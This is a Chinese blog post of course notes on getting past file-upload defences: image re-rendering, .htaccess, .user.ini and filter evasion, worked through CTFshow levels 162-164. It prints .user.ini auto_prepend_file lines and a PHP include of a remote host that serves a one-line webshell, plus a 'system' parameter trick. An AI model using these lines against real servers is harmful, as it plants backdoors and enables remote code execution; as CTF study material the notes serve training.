第三十二天:文件上传&二次渲染&.htaccess&变异免杀

最新推荐文章于 2024-02-29 11:00:00 发布
最新推荐文章于 2024-02-29 11:00:00 发布
阅读量240 收藏
点赞数
分类专栏: 网络安全 文章标签: php 前端 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51322401/article/details/128891479
版权

1、文件上传-二次渲染

2、文件上传-简单免杀变异

3、文件上传-.htaccess妙用

4、文件上传-PHP语言特性

#详细点:

1、检测层面:前端,后端等

2、检测内容:文件头,完整性,二次渲染等

3、检测后缀:黑名单,白名单,MIME检测等

4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等

#本章课程内容:

1、文件上传-CTF赛题知识点

2、文件上传-中间件解析&编辑器安全

3、文件上传-实例CMS文件上传安全分析

#前置:

后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)

如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门

如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess

文件二次渲染:

1、判断上传前和上传后的文件大小及内容

2、判断上传后的文件返回数据包内容

CTFSHOW-文件上传-162到170关卡
162 突破.过滤
过滤 . () {} ; 等

利用远程包含IP转换地址(长地址后门)调用执行

.user.ini auto_prepend_file=png

png <?=include’http://794750069/'> //这里的http://794750069/是一个包含一句话木马的网页

https://www.bejson.com/convert/ip2int/

163 突破上传删除
过滤 . () {} ; 等 同时文件被删除

这里有两种情况:

1.直接全部都删除,这种就只能通过条件竞争(即通过快速访问文件,让文件的进程被占用,导致无法删除)

2.根据过滤来删除 这种就可以通过,直接通过.user,ini 直接远程包含 来绕过。

直接利用.user.ini包含远程

auto_prepend_file=http://794750069/

auto_prepend_file=http://794750069/

164 png二次渲染
https://blog.csdn.net/qq_40800734/article/details/105920149

get 0=system

新奇八
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全--文件上传漏洞--通用漏洞--PHP
weixin_68243135的博客
11-17 732
Web安全--文件上传--绕过--php
通过配置.htaccess文件实现子目录绑定二级域名的方法
09-11
通过配置.htaccess文件实现子目录绑定二级域名的方法 .htaccess文件是Apache服务器中的一种配置文件,它可以对服务器的行为进行控制和配置。通过在.htaccess文件中添加相应的规则,我们可以实现子目录绑定二级域名...
文件上传绕过】--二次渲染
nareku的博客
04-07 8410
二次渲染原理 在我们上传文件后,网站会对图片进行二次处理(格式、尺寸,保存,删除 要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。 绕过方法 1.配合条件竞争漏洞 ...
WEB攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀
m0_65336233的博客
10-12 1073
WEB攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀
upload-labs靶场Pass-16二次渲染png格式上传
FRANXX_02的博客
10-10 1145
upload-labs靶场Pass-16二次渲染png格式上传colortype索引为03的索引彩色图像
文件上传之路之六:绕过图片二次渲染上传
weixin_62715196的博客
08-15 771
绕过图片二次渲染上传,文件上传的一种类型
nginx支持.htaccess文件实现伪静态的方法分享
01-20
在Google上搜索的资料很多人都说nginx目前不支持.htaccess文件,我按照nginx的规则试验了一下,结果发现nginx是完全支持.htaccess文件的! 方法如下: 1. 在需要使用.htaccess文件的目录下新建一个.htaccess文件, ...
Apache服务器中.htaccess文件的实用配置示例集锦
09-10
Apache服务器中的`.htaccess`文件是一个非常重要的工具,它允许网站管理员无需直接修改服务器的主配置文件即可控制和定制特定目录的行为。`.htaccess`文件主要用于实现一系列HTTP服务器的指令,如URL重写、访问控制...
21个常用的apache .htaccess文件配置技巧分享
01-10
Apache Web 服务器可以通过 .htaccess 文件来操作各种信息,这是一个目录级配置文件的默认名称,允许去中央化的 Web 服务器配置管理。可用来重写服务器的全局配置。该文件的目的就是为了允许单独目录的访问控制配置...
工具查询.htaccess Editor:htaccess在线生成器-htaccesseditor.zip
最新发布
03-10
.htaccess 文件,全称为 Hypertext Access,是Apache服务器中的一个配置文件,用于对网站进行局部设置,以实现URL重写、访问权限控制、错误页面定制等功能。本文将深入探讨如何使用 .htaccess 在线生成器——...
WEB-ctfshow入门文件包含
ing_end的博客
06-04 434
查看源码可以发现只能上传png图片 修改为php 修改上传格式为php,上传一句话马,蚁剑连接得flag 后端校验 上传一句话,png文件用burp抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。打开发现/upload下存在index.php文件,我们可以利用.user.ini, 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png 蚁剑连接得flag。 提示文件内容不合规,发现过滤了php,可使用短标签 蚁剑连接得f
WEB攻防-PHP应用&文件上传&函数缺陷&条件竞争&二次渲染&黑白名单&JS绕过
siu~
09-06 291
1、PHP-原生态-文件上传-检测后缀&黑白名单 2、PHP-原生态-文件上传-检测信息&类型内容 3、PHP-原生态-文件上传-函数缺陷&逻辑缺陷 4、PHP-原生态-文件上传-版本缺陷&配置缺陷
09_上传漏洞_文件包含&二次渲染&代码逻辑漏洞
qq_42171569的博客
06-26 1235
【本篇博客不对文件包含展开】正如前篇博客所述,白名单是一种极好的过滤方式,虽然php、asp代码中常常可以用00截断的方式绕过白名单过滤,但在服务器高版本的情况下,截断技术也会失效。那么这种情况下是否就没有思路进行渗透了呢?并不是,一种情况是出现了文件包含漏洞,也就是说这里上传的文件是合法的,但是其中含有恶意代码。存在文件包含漏洞漏洞前提下,合法文件可以通过某种方式作为脚本执行。当然本篇博客的内容重点不在于文件包含,安排这个板块的目的在于强调:漏洞的存在不是互斥的。因此,实战中对于漏洞的利用需要考虑“打组合
day 32 文件上传&二次渲染&.htaccess&变异免杀
wanjia01的博客
11-22 979
#知识点:1、文件上传-二次渲染2、文件上传-简单免杀变异3、文件上传-.htaccess妙用4、文件上传-PHP语言特性#详细点:1、检测层面:前端,后端等2、检测内容文件头,完整性,二次渲染等3、检测后缀:黑名单,白名单,MIME检测等4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等#本章课程内容:1、文件上传-CTF赛题知识点2、文件上传-中间件解析&编辑器安全3、文件上传-实例CMS文件上传安全分析#前置:后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)如:jp
文件上传之图片二次渲染上传
2301_79299101的博客
11-08 438
1,有些图片上传,会对上传的图片进行二次渲染后在保存,体积可能会更小,图片会模糊一些,但是符合网站的需求。例如新闻图片封面等可能需要二次渲染,因为原图片占用的体积更大。访问的人数太多时候会占用,很大带宽。二次渲染后的图片内容会减少,如果里面包含后门代码,可能会被省略。导致上传的图片马,恶意代码被清除。只允许上传 JPG PNG gif 在源码中使用 imagecreatefromgif 函数对图片进行二次生成。生成的图片保存在,upload目录下。接着对比两者之间有什么相同点。将修改好的图片再次上传。
【upload靶场17-21】二次渲染、条件竞争、黑白名单绕过
07-20 843
【upload靶场】
上传验证绕过——服务端内容检查绕过
Williamanddog的博客
01-29 495
二次渲染:就是根据用户上传的图片,新生成一个图片,将原始图片删除,将新图片添加到数据库中。头,题目检查的也就是这个,可以在bp里直接加,也可以通过图片马直接上传然后getshell。随便打开两张PNG的图片看下,在文件的头部都会有其专有的字符。将源文件二次渲染过的文件进行比较,找出源文件中没有被修改的那段区域,在那段区域写入php代。然后将图片下载下来,可以看到下载下来的文件名已经变化,所以这是经过二次渲染的图片。(1)先上传一个内容为木马的txt后缀文件,因为后缀名的关系没有检验内容
【后端检测-绕过】文件头检测绕过、二次渲染绕过
07-03 5292
【后端检测-绕过】
047-WEB攻防-PHP应用&文件上传&函数缺陷&条件竞争&二次渲染&黑白名单&JS绕过
wushangyu32335的博客
02-29 1226
小迪安全2023笔记
.htaccess文件上传
08-12
然而,对于.htaccess文件的上传存在一定的安全风险,因为它可能被恶意用户利用来执行攻击或绕过安全机制。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值